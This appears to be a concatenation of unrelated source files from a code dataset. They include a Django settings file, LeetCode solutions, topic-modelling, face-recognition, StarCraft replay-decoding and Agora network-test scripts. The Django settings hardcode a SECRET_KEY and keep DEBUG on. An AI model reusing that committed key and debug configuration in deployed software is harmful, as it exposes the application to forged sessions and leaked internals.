] | permissive | Vansh983/e-school | c54835a43eaa919713d1f394f35f87223197c697 | 2d8458a3a649ae7f5788b1f7fb2d7179fcccdea0 | refs/heads/master | 2020-09-22T21:10:22.346362 | 2019-12-01T18:37:19 | 2019-12-01T18:37:19 | 225,322,071 | 2 | 0 | MIT | 2019-12-02T08:21:28 | 2019-12-02T08:21:27 | null | UTF-8 | Python | false | false | 3,299 | py | """
Django settings for eschool project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# For static files
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
STATICFILES_DIRS = (
    os.path.join(PROJECT_ROOT, 'static'),
)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; load it from an
# environment variable (e.g. os.environ['DJANGO_SECRET_KEY']) and rotate
# the key before any deployment.
SECRET_KEY = 'o89esr=m9^lf-$q$ev$86ne1tcf6_5u2qx!hm22%q_qb4x-kib'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty is fine for local development; production must list served hostnames.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'home',
'accounts',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'eschool.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'eschool.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"alberto.navalonlillo@gmail.com"
] | alberto.navalonlillo@gmail.com |
9679197a61ccf26610d250d3868a81a8e7401233 | 3e9cdcc8847da5a2ea8391639ad8fd95592475b1 | /696.py | edda7ebd43c2b347e2386e5ca317ea69007a5d58 | [] | no_license | mindentropy/leetcode | ec790ed671a2224411133af127e605438bbbbe52 | 4a24edca5926c0b10d1a4786262dd403b12d1aee | refs/heads/master | 2023-01-27T11:26:07.949478 | 2023-01-25T19:08:18 | 2023-01-25T19:08:18 | 233,759,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | #!/usr/bin/env python
class Solution(object):
def countBinarySubstrings(self, s):
strcnt = 0
i = 0
while i < len(s) - 1:
j = i + 1
oppcnt = 1
eqflag = True
while j < len(s):
if s[i] == s[j]:
if eqflag == False:
break
oppcnt += 1
else:
oppcnt -= 1
eqflag = False
j += 1
if oppcnt <= 0:
break
if oppcnt == 0:
strcnt += 1
i += 1
return strcnt
class Solution(object):
def countBinarySubstrings(self, s):
group = [1]
for idx in xrange(1, len(s)):
if s[idx - 1] != s[idx]:
group.append(1)
else:
group[-1] += 1
cnt = 0
for idx in xrange(len(group) - 1):
cnt += min(group[idx], group[idx + 1])
return cnt
if __name__ == '__main__':
sol = Solution()
print sol.countBinarySubstrings('00110011')
| [
"mindentropy@gmail.com"
] | mindentropy@gmail.com |
830b34bfb2dece6d806d63c167e8d1b7584b9087 | c1da5c1530ff768d9c9ed61b70f7913eb1c4172e | /Practice/Matrix/AkshayAlphabeticTraversal.py | 3f6ee2fac6d427a29ef944c56591f39235846fcb | [] | no_license | saumyasinha023/PythonProgramming | b3773d52e1058deebeffab0315d154784c154f87 | 610474ee649df184ff24c00d869f69ffd7af52e5 | refs/heads/master | 2021-05-10T11:02:11.160595 | 2018-03-12T17:29:34 | 2018-03-12T17:29:34 | 118,398,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | class Solution():
def traverse(self, mat):
final, path = [], []
self.helper(mat, final, path, 0, 0)
print(final)
def helper(self, mat, final, path, each, every):
if each >= len(mat) or every >= len(mat[0]) or each < 0 or every < 0:
return
if each == len(mat) - 1 and every == len(mat[0]) - 1:
final.append(path)
self.helper(mat, final, path + ['H'], each, every + 1)
self.helper(mat, final, path + ['V'], each + 1, every)
return final
S = Solution()
S.traverse([[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]])
| [
"saumyasinha023@gmail.com"
] | saumyasinha023@gmail.com |
dc54a632a8eb63b286896f488c5370a27ece786f | ee30ecc3228d41374ff915d945d658495eb74916 | /utils/topic_model.py | 3906d16dcd59b1138ba76d06bb46718f48f8d26d | [] | no_license | Xueping/social_sentiment | 46204c1c1d1832d1058825af24e83454ecfc4b65 | 9b1ee521f7c3d60a268354fe2cb5f8eb85d69525 | refs/heads/master | 2023-02-16T14:46:31.278671 | 2021-01-13T07:57:00 | 2021-01-13T07:57:00 | 282,819,101 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,337 | py | from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
# from utils import clean_tweets, update_stopwords
from utils.utils import clean_tweets, update_stopwords
# from sentiment.utils import clean_tweets, update_stopwords
import collections
import pandas as pd
import gensim
from gensim import corpora
import nltk
from nltk.corpus import wordnet as wn
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.tokenize import TweetTokenizer
nltk.download('wordnet')
tknzr = TweetTokenizer()
def word_frequency(wd_list, stopwords, top_k=None):
all_words = ' '.join([text for text in wd_list])
filtered_words = [word.lower() for word in all_words.split() if word.lower() not in stopwords]
counted_words = collections.Counter(filtered_words)
words_counts = {}
if top_k is None:
wc = counted_words.most_common()
else:
wc = counted_words.most_common(top_k)
for letter, count in wc:
words_counts[letter] = count
return words_counts
# NLTK’s Wordnet to find the meanings of words, synonyms, antonyms, and more.
def get_lemma(word):
lemma = wn.morphy(word)
if lemma is None:
return word
else:
return lemma
# WordNetLemmatizer to get the root word.
def get_lemma2(word):
return WordNetLemmatizer().lemmatize(word)
def prepare_text_for_lda(text, en_stop):
tokens = tknzr.tokenize(text)
# filter token whose length is more than 4
tokens = [token for token in tokens if len(token) > 4]
# filter the stop words and lowercase token
tokens = [token.lower() for token in tokens if token.lower() not in en_stop]
# NLTK’s Wordnet to find the meanings of words, synonyms, antonyms, and more.
tokens = [get_lemma(token) for token in tokens]
# get the root word
tokens = [get_lemma2(token) for token in tokens]
return tokens
def lda_model(tweets, stop_words, num_topic, num_words):
text_data = []
for tweet in tweets:
tokens = prepare_text_for_lda(tweet, stop_words)
text_data.append(tokens)
# build dictionary id2word
dictionary = corpora.Dictionary(text_data)
# create corpus, document to bag of words
corpus = [dictionary.doc2bow(text) for text in text_data]
# print(corpus)
ldamodel = gensim.models.ldamodel.LdaModel(corpus,
num_topics=num_topic,
id2word=dictionary,
passes=15)
topics = ldamodel.print_topics(num_words)
return topics, dictionary, corpus
if __name__ == '__main__':
num_topic = 10
num_words = 10
analyser = SentimentIntensityAnalyzer()
file_name = "tweets_trump_wall.csv"
df_text = pd.read_csv(file_name)
tweets = clean_tweets(df_text.text)
# additional stopwords
new_stopwords = [ '&', '-', '…', 'one', 'got', 'to…', '...']
stop_words = update_stopwords(new_stopwords)
# get word frequency
word_frq = word_frequency(tweets, stop_words)
print(word_frq)
# get topic model
topics, dictionary, corpus = lda_model(tweets, stop_words, num_topic, num_words)
for topic in topics:
print(topic)
# token to id in dictionary
print(dictionary.token2id)
# token_id to document
print(corpus)
| [
"xueping.peng@uts.edu.au"
] | xueping.peng@uts.edu.au |
daab4e7b32ce7108371efd534f90e539cb5ecffe | 3b20b70f832c08e70cbe93e48a2afc50f2f90824 | /challenge-3/challenge3.py | dd05ac4fc570a0cbad508e6a2d6d534e8a5e04ce | [] | no_license | xabinapal/tuenti-challenge-10 | d3d29ac80a2617acef9db4a2355d82feef62be5a | d37317041c543811ef117490139dba03a182b5fc | refs/heads/master | 2022-06-27T07:01:01.604062 | 2020-05-10T14:41:49 | 2020-05-10T14:41:49 | 261,166,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | from collections import defaultdict
ORDERED_CHARS = (
"a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k",
"l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v",
"w", "x", "y", "z", "á", "é", "í", "ñ", "ó", "ú", "ü")
word_count = defaultdict(int)
longest_word = 0
with open("../assets/challenge-3/pg17013.txt") as f:
word = ""
while True:
char = f.read(1)
if not char:
break
char = char.lower()
if char in ORDERED_CHARS:
word += char
elif len(word) >= 3:
word_count[word] += 1
longest_word = max(longest_word, len(word))
word = ""
else:
word = ""
def transform_word(word):
padding = [len(ORDERED_CHARS) + 1] * (longest_word - len(word))
return [len(ORDERED_CHARS) - ORDERED_CHARS.index(char) for char in word] + padding
word_list = sorted(
word_count.items(),
reverse=True,
key=lambda word: (word[1], *transform_word(word[0])))
for case in range(1, int(input()) + 1):
data = input()
try:
ranking = int(data)
word, instances = word_list[ranking - 1]
print(f"Case #{case}: {word} {instances}")
except:
ranking, instances = next(
(word[0] + 1, word[1][1])
for word in enumerate(word_list) if word[1][0] == data)
print(f"Case #{case}: {instances} #{ranking}") | [
"naxabier@gmail.com"
] | naxabier@gmail.com |
7e704aa9900eaae365c0bc39c1cd6c4ec2f9c868 | 904dea38a37577b7bdf7659f8b7d5ca6c3ded080 | /zephyrus_sc2_parser/s2protocol_fixed/decoders.py | 4b5d92e76565011ea918f42e0303c596f27a10b3 | [
"MIT"
] | permissive | ZephyrBlu/zephyrus-sc2-parser | cae674991d1bb6e3ab31369c66d08eefa2002b31 | 230c0d85802b0c5ddf8bde2883dc1f9d0cc68856 | refs/heads/master | 2023-05-28T02:47:38.245313 | 2022-11-21T13:24:56 | 2022-11-21T13:24:56 | 211,752,451 | 37 | 8 | MIT | 2023-05-22T22:44:29 | 2019-09-30T01:35:39 | Python | UTF-8 | Python | false | false | 10,036 | py | # Copyright (c) 2013-2017 Blizzard Entertainment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import struct
from zephyrus_sc2_parser.s2protocol_fixed.compat import byte_to_int
class TruncatedError(Exception):
pass
class CorruptedError(Exception):
pass
class BitPackedBuffer:
def __init__(self, contents, endian='big'):
self._data = contents or []
self._used = 0
self._next = None
self._nextbits = 0
self._bigendian = (endian == 'big')
def __str__(self):
s = '{:02x}'.format(byte_to_int(self._data[self._used])) \
if self._used < len(self._data) else '--'
return 'buffer({0:02x}/{1:d},[{2:d}]={3:s})'.format(
self._nextbits and self._next or 0,
self._nextbits,
self._used,
s
)
def done(self):
return self._nextbits == 0 and self._used >= len(self._data)
def used_bits(self):
return self._used * 8 - self._nextbits
def byte_align(self):
self._nextbits = 0
def read_aligned_bytes(self, bytes):
self.byte_align()
data = self._data[self._used:self._used + bytes]
self._used += bytes
if len(data) != bytes:
raise TruncatedError(self)
return data
def read_bits(self, bits):
result = 0
resultbits = 0
while resultbits != bits:
if self._nextbits == 0:
if self.done():
raise TruncatedError(self)
self._next = byte_to_int(self._data[self._used])
self._used += 1
self._nextbits = 8
copybits = min(bits - resultbits, self._nextbits)
copy = (self._next & ((1 << copybits) - 1))
if self._bigendian:
result |= copy << (bits - resultbits - copybits)
else:
result |= copy << resultbits
self._next >>= copybits
self._nextbits -= copybits
resultbits += copybits
return result
def read_unaligned_bytes(self, bytes):
return ''.join([chr(self.read_bits(8)) for i in range(bytes)])
class BitPackedDecoder:
def __init__(self, contents, typeinfos):
self._buffer = BitPackedBuffer(contents)
self._typeinfos = typeinfos
def __str__(self):
return self._buffer.__str__()
def instance(self, typeid):
if typeid >= len(self._typeinfos):
raise CorruptedError(self)
typeinfo = self._typeinfos[typeid]
#print ' -- instance ', typeid, typeinfo
return getattr(self, typeinfo[0])(*typeinfo[1])
def byte_align(self):
self._buffer.byte_align()
def done(self):
return self._buffer.done()
def used_bits(self):
return self._buffer.used_bits()
def _array(self, bounds, typeid):
length = self._int(bounds)
return [self.instance(typeid) for i in range(length)]
def _bitarray(self, bounds):
length = self._int(bounds)
return (length, self._buffer.read_bits(length))
def _blob(self, bounds):
length = self._int(bounds)
result = self._buffer.read_aligned_bytes(length)
return result
def _bool(self):
return self._int((0, 1)) != 0
def _choice(self, bounds, fields):
tag = self._int(bounds)
if tag not in fields:
raise CorruptedError(self)
field = fields[tag]
return {field[0]: self.instance(field[1])}
def _fourcc(self):
return self._buffer.read_unaligned_bytes(4)
def _int(self, bounds):
return bounds[0] + self._buffer.read_bits(bounds[1])
def _null(self):
return None
def _optional(self, typeid):
exists = self._bool()
return self.instance(typeid) if exists else None
def _real32(self):
return struct.unpack('>f', self._buffer.read_unaligned_bytes(4))
def _real64(self):
return struct.unpack('>d', self._buffer.read_unaligned_bytes(8))
def _struct(self, fields):
result = {}
for field in fields:
if field[0] == '__parent':
parent = self.instance(field[1])
if isinstance(parent, dict):
result.update(parent)
elif len(fields) == 1:
result = parent
else:
result[field[0]] = parent
else:
result[field[0]] = self.instance(field[1])
return result
class VersionedDecoder:
def __init__(self, contents, typeinfos):
self._buffer = BitPackedBuffer(contents)
self._typeinfos = typeinfos
def __str__(self):
return self._buffer.__str__()
def instance(self, typeid):
if typeid >= len(self._typeinfos):
raise CorruptedError(self)
typeinfo = self._typeinfos[typeid]
return getattr(self, typeinfo[0])(*typeinfo[1])
def byte_align(self):
self._buffer.byte_align()
def done(self):
return self._buffer.done()
def used_bits(self):
return self._buffer.used_bits()
def _expect_skip(self, expected):
if self._buffer.read_bits(8) != expected:
raise CorruptedError(self)
def _vint(self):
b = self._buffer.read_bits(8)
negative = b & 1
result = (b >> 1) & 0x3f
bits = 6
while (b & 0x80) != 0:
b = self._buffer.read_bits(8)
result |= (b & 0x7f) << bits
bits += 7
return -result if negative else result
def _array(self, bounds, typeid):
self._expect_skip(0)
length = self._vint()
return [self.instance(typeid) for i in range(length)]
def _bitarray(self, bounds):
self._expect_skip(1)
length = self._vint()
return (length, self._buffer.read_aligned_bytes((length + 7) / 8))
def _blob(self, bounds):
self._expect_skip(2)
length = self._vint()
return self._buffer.read_aligned_bytes(length)
def _bool(self):
self._expect_skip(6)
return self._buffer.read_bits(8) != 0
def _choice(self, bounds, fields):
self._expect_skip(3)
tag = self._vint()
if tag not in fields:
self._skip_instance()
return {}
field = fields[tag]
return {field[0]: self.instance(field[1])}
def _fourcc(self):
self._expect_skip(7)
return self._buffer.read_aligned_bytes(4)
def _int(self, bounds):
self._expect_skip(9)
return self._vint()
def _null(self):
return None
def _optional(self, typeid):
self._expect_skip(4)
exists = self._buffer.read_bits(8) != 0
return self.instance(typeid) if exists else None
def _real32(self):
self._expect_skip(7)
return struct.unpack('>f', self._buffer.read_aligned_bytes(4))
def _real64(self):
self._expect_skip(8)
return struct.unpack('>d', self._buffer.read_aligned_bytes(8))
def _struct(self, fields):
self._expect_skip(5)
result = {}
length = self._vint()
for i in range(length):
tag = self._vint()
field = next((f for f in fields if f[2] == tag), None)
if field:
if field[0] == '__parent':
parent = self.instance(field[1])
if isinstance(parent, dict):
result.update(parent)
elif len(fields) == 1:
result = parent
else:
result[field[0]] = parent
else:
result[field[0]] = self.instance(field[1])
else:
self._skip_instance()
return result
def _skip_instance(self):
skip = self._buffer.read_bits(8)
if skip == 0: # array
length = self._vint()
for i in range(length):
self._skip_instance()
elif skip == 1: # bitblob
length = self._vint()
self._buffer.read_aligned_bytes((length + 7) / 8)
elif skip == 2: # blob
length = self._vint()
self._buffer.read_aligned_bytes(length)
elif skip == 3: # choice
tag = self._vint()
self._skip_instance()
elif skip == 4: # optional
exists = self._buffer.read_bits(8) != 0
if exists:
self._skip_instance()
elif skip == 5: # struct
length = self._vint()
for i in range(length):
tag = self._vint()
self._skip_instance()
elif skip == 6: # u8
self._buffer.read_aligned_bytes(1)
elif skip == 7: # u32
self._buffer.read_aligned_bytes(4)
elif skip == 8: # u64
self._buffer.read_aligned_bytes(8)
elif skip == 9: # vint
self._vint()
| [
"lukejholroyd@gmail.com"
] | lukejholroyd@gmail.com |
3e71ece847c365bef59fc95b8456057f4ddad690 | 9e12684c1e099daf85bad4f2f140edda9edc1d9f | /survey/admin.py | 81e889848f5c19add5d8b8cadb81c1ea2747d65e | [] | no_license | RuaConIT/AICOVIDVN-APP | 6c3428f2478a099c10b20bdffc585bef55732752 | 359387415c3c206ffbb76f1c42be3eb8298f04c3 | refs/heads/main | 2023-07-16T14:18:27.491587 | 2021-08-27T15:10:40 | 2021-08-27T15:10:40 | 392,717,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | from django.contrib import admin
from .models import Survey
# Register your models here.
admin.site.register(Survey) | [
"mhieuhcmup@gmail.com"
] | mhieuhcmup@gmail.com |
9177a04c5edb5ecbaff8f25d73b1cbf82f9d1ba1 | 73527b489a9dd792e1e5c3a52afa27988acecd8e | /Case225.py | aeb7f7b40389da9cb7bd2c316d0bc3ee33eac7bc | [] | no_license | guxiajun/TestCases | 3d3a3922775b239491b75d43d718f332d4a3ebcd | 2c2e5fd53abdb9370228fd34f5a7448223ddac7b | refs/heads/master | 2020-08-31T10:58:57.683799 | 2020-05-07T12:53:20 | 2020-05-07T12:53:20 | 218,674,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,460 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import ctypes
import time
import os
import random
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
path = BASE_DIR+"/libpycmd.so"
print(path)
def needterms():
return "2"
def categories():
return "broadcast"
def shortDesc():
return "(外部源直播)进入频道,两个主播连麦720P2400K,限制上行弱网1000K+20%丢包+200msdelay,统计设备B侧的卡顿率和延时"
def detailDesc():
return "(直播)A B设备一直在同一个频道内,设置设备的上行丢包策略,通过log计算播放侧的卡顿率"
def run():
ll= ctypes.cdll.LoadLibrary
lib = ll(path)
lib.ExeCmdCallBack(0, "impairNet,0")
lib.ExeCmdCallBack(1, "impairNet,0")
lib.ExeCmdCallBack(0, "Readyuv,agora_720_1280_30.yuv,720,1280,30,0")
lib.ExeCmdCallBack(0, "setParameters,{\"rtc.log_size\":20000000}")
lib.ExeCmdCallBack(1, "setParameters,{\"rtc.log_size\":20000000}")
lib.ExeCmdCallBack(0, "setParameters,{\"che.video.LogcatVideoQoS\":1}")
lib.ExeCmdCallBack(1, "setParameters,{\"che.video.LogcatVideoQoS\":1}")
lib.ExeCmdCallBack(0, "setExternalVideoSource,true,false,true")
lib.ExeCmdCallBack(0, "setChannelProfile,1")
lib.ExeCmdCallBack(0, "setClientRole,1,nil")
lib.ExeCmdCallBack(0, "setVideoEncoderConfiguration,1280,720,15,2400,0")
lib.ExeCmdCallBack(0, "enableVideo")
lib.ExeCmdCallBack(0, "setupLocalVideo,2,-1")
lib.ExeCmdCallBack(0, "setupRemoteVideo,2,2,-1")
Testchannelname = "Test"+str(random.random())
lib.ExeCmdCallBack(0, "joinChannelByKey,nil,"+Testchannelname+",nil,1")
lib.ExeCmdCallBack(1, "setChannelProfile,1")
lib.ExeCmdCallBack(1, "setClientRole,1,nil")
lib.ExeCmdCallBack(1, "setVideoEncoderConfiguration,1280,720,15,2400,0")
lib.ExeCmdCallBack(1, "enableVideo")
lib.ExeCmdCallBack(1, "setupLocalVideo,2,-1")
lib.ExeCmdCallBack(1, "setupRemoteVideo,1,2,-1")
lib.ExeCmdCallBack(1, "joinChannelByKey,nil,"+Testchannelname+",nil,2")
time.sleep(10)
lib.ExeCmdCallBack(0, "impairNet,1000 20 200")
lib.ExeCmdCallBack(0, "SLEEP,180")
lib.ExeCmdCallBack(0, "setExternalVideoSource,false,false,true")
lib.ExeCmdCallBack(0, "leaveChannel")
lib.ExeCmdCallBack(1, "leaveChannel")
lib.ExeCmdCallBack(0, "impairNet,0")
lib.ExeCmdCallBack(0, "getFile")
lib.ExeCmdCallBack(1, "getFile")
lib.ExeCmdCallBack(1, "DELAY")
return "4" | [
"guxiajun@agora.io"
] | guxiajun@agora.io |
84b33528b8b77d2b5ba2007d6df3fe2fa7a90d89 | ebf6f5cb6be81e05ea152654a26c5a54c3e990db | /face_recognition/face_regconition_KNN.py | 86884f7228e71fded5e77b0ff26beb5a40495a1d | [
"MIT"
] | permissive | hoanmy/computer_vision_case_study | b8ac3e27f936b741fbd024700aff984a3e7cda49 | 8497a2c812f33ea6d055adcacdf39f225d1aa121 | refs/heads/master | 2020-04-17T00:54:13.298681 | 2019-06-27T07:34:21 | 2019-06-27T07:34:21 | 166,067,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,628 | py |
import math
from sklearn import neighbors
import os
import os.path
import pickle
from PIL import Image, ImageDraw, ImageFont
import cv2
from pathlib import Path
import face_recognition
from face_recognition.face_recognition_cli import image_files_in_folder
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}
font = ImageFont.truetype("arial.ttf", 30);
def train(train_dir, model_save_path=None, n_neighbors=None, knn_algo='ball_tree', verbose=False):
"""
Trains a k-nearest neighbors classifier for face recognition.
:param train_dir: directory that contains a sub-directory for each known person, with its name.
(View in source code to see train_dir example tree structure)
Structure:
<train_dir>/
├── <person1>/
│ ├── <somename1>.jpeg
│ ├── <somename2>.jpeg
│ ├── ...
├── <person2>/
│ ├── <somename1>.jpeg
│ └── <somename2>.jpeg
└── ...
:param model_save_path: (optional) path to save model on disk
:param n_neighbors: (optional) number of neighbors to weigh in classification. Chosen automatically if not specified
:param knn_algo: (optional) underlying data structure to support knn.default is ball_tree
:param verbose: verbosity of training
:return: returns knn classifier that was trained on the given data.
"""
X = []
y = []
# Loop through each person in the training set
for class_dir in os.listdir(train_dir):
if not os.path.isdir(os.path.join(train_dir, class_dir)):
continue
# Loop through each training image for the current person
for img_path in image_files_in_folder(os.path.join(train_dir, class_dir)):
image = face_recognition.load_image_file(img_path)
face_bounding_boxes = face_recognition.face_locations(image)
if len(face_bounding_boxes) != 1:
# If there are no people (or too many people) in a training image, skip the image.
if verbose:
print("Image {} not suitable for training: {}".format(img_path, "Didn't find a face" if len(face_bounding_boxes) < 1 else "Found more than one face"))
else:
# Add face encoding for current image to the training set
X.append(face_recognition.face_encodings(image, known_face_locations=face_bounding_boxes)[0])
y.append(class_dir)
# Determine how many neighbors to use for weighting in the KNN classifier
if n_neighbors is None:
n_neighbors = int(round(math.sqrt(len(X))))
if verbose:
print("Chose n_neighbors automatically:", n_neighbors)
# Create and train the KNN classifier
knn_clf = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors, algorithm=knn_algo, weights='distance')
knn_clf.fit(X, y)
# Save the trained KNN classifier
if model_save_path is not None:
with open(model_save_path, 'wb') as f:
pickle.dump(knn_clf, f)
return knn_clf
def predict(X_img_path, knn_clf=None, model_path=None, distance_threshold=0.4):
"""
Recognizes faces in given image using a trained KNN classifier
:param X_img_path: path to image to be recognized
:param knn_clf: (optional) a knn classifier object. if not specified, model_save_path must be specified.
:param model_path: (optional) path to a pickled knn classifier. if not specified, model_save_path must be knn_clf.
:param distance_threshold: (optional) distance threshold for face classification. the larger it is, the more chance
of mis-classifying an unknown person as a known one.
:return: a list of names and face locations for the recognized faces in the image: [(name, bounding box), ...].
For faces of unrecognized persons, the name 'unknown' will be returned.
"""
if not os.path.isfile(X_img_path) or os.path.splitext(X_img_path)[1][1:] not in ALLOWED_EXTENSIONS:
raise Exception("Invalid image path: {}".format(X_img_path))
if knn_clf is None and model_path is None:
raise Exception("Must supply knn classifier either thourgh knn_clf or model_path")
# Load a trained KNN model (if one was passed in)
if knn_clf is None:
with open(model_path, 'rb') as f:
knn_clf = pickle.load(f)
# Load image file and find face locations
X_img = face_recognition.load_image_file(X_img_path)
X_face_locations = face_recognition.face_locations(X_img)
# If no faces are found in the image, return an empty result.
if len(X_face_locations) == 0:
return []
# Find encodings for faces in the test iamge
faces_encodings = face_recognition.face_encodings(X_img, known_face_locations=X_face_locations)
# Use the KNN model to find the best matches for the test face
closest_distances = knn_clf.kneighbors(faces_encodings, n_neighbors=1)
are_matches = [closest_distances[0][i][0] <= distance_threshold for i in range(len(X_face_locations))]
# Predict classes and remove classifications that aren't within the threshold
return [(pred, loc) if rec else ("unknown", loc) for pred, loc, rec in zip(knn_clf.predict(faces_encodings), X_face_locations, are_matches)]
def show_prediction_labels_on_image(img_path, predictions):
"""
Shows the face recognition results visually.
:param img_path: path to image to be recognized
:param predictions: results of the predict function
:return:
"""
pil_image = Image.open(img_path).convert("RGB")
draw = ImageDraw.Draw(pil_image)
for name, (top, right, bottom, left) in predictions:
# Draw a box around the face using the Pillow module
draw.rectangle(((left, top), (right, bottom)), outline=(0, 0, 255))
# There's a bug in Pillow where it blows up with non-UTF-8 text
# when using the default bitmap font
#name = name.encode("UTF-8")
# Draw a label with a name below the face
text_width, text_height = draw.textsize(name, font=font)
draw.rectangle(((left, bottom - text_height - 10), (right, bottom)), fill=(0, 0, 255), outline=(0, 0, 255))
draw.text((left + 6, bottom - text_height - 5), name, fill=(255, 255, 255, 255), font=font)
# Remove the drawing library from memory as per the Pillow docs
del draw
# Display the resulting image
# pil_image.show()
pil_image.save("output/" + Path(img_path).name)
if __name__ == "__main__":
# STEP 1: Train the KNN classifier and save it to disk
# Once the model is trained and saved, you can skip this step next time.
print("Training KNN classifier...")
classifier = train("./face_db", model_save_path="trained_knn_model.clf", n_neighbors=2)
print("Training complete!")
# STEP 2: Using the trained classifier, make predictions for unknown images
for image_file in os.listdir("test_db"):
full_file_path = os.path.join("test_db", image_file)
print("Looking for faces in {}".format(image_file))
# Find all people in the image using a trained classifier model
# Note: You can pass in either a classifier file name or a classifier model instance
predictions = predict(full_file_path, model_path="trained_knn_model.clf")
# Print results on the console
for name, (top, right, bottom, left) in predictions:
print("- Found {} at ({}, {})".format(name, left, top))
# Display results overlaid on an image
show_prediction_labels_on_image(os.path.join("test_db", image_file), predictions)
| [
"mynguyen@hp-envy"
] | mynguyen@hp-envy |
8bf5c9cb87033d334d26c9436c9f04e4b173ba65 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/kusto/azure-mgmt-kusto/generated_samples/kusto_managed_private_endpoints_check_name_availability.py | 3ccfc9a68d42bd47f54b8ba0ce14082f3885382b | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,746 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.kusto import KustoManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-kusto
# USAGE
python kusto_managed_private_endpoints_check_name_availability.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
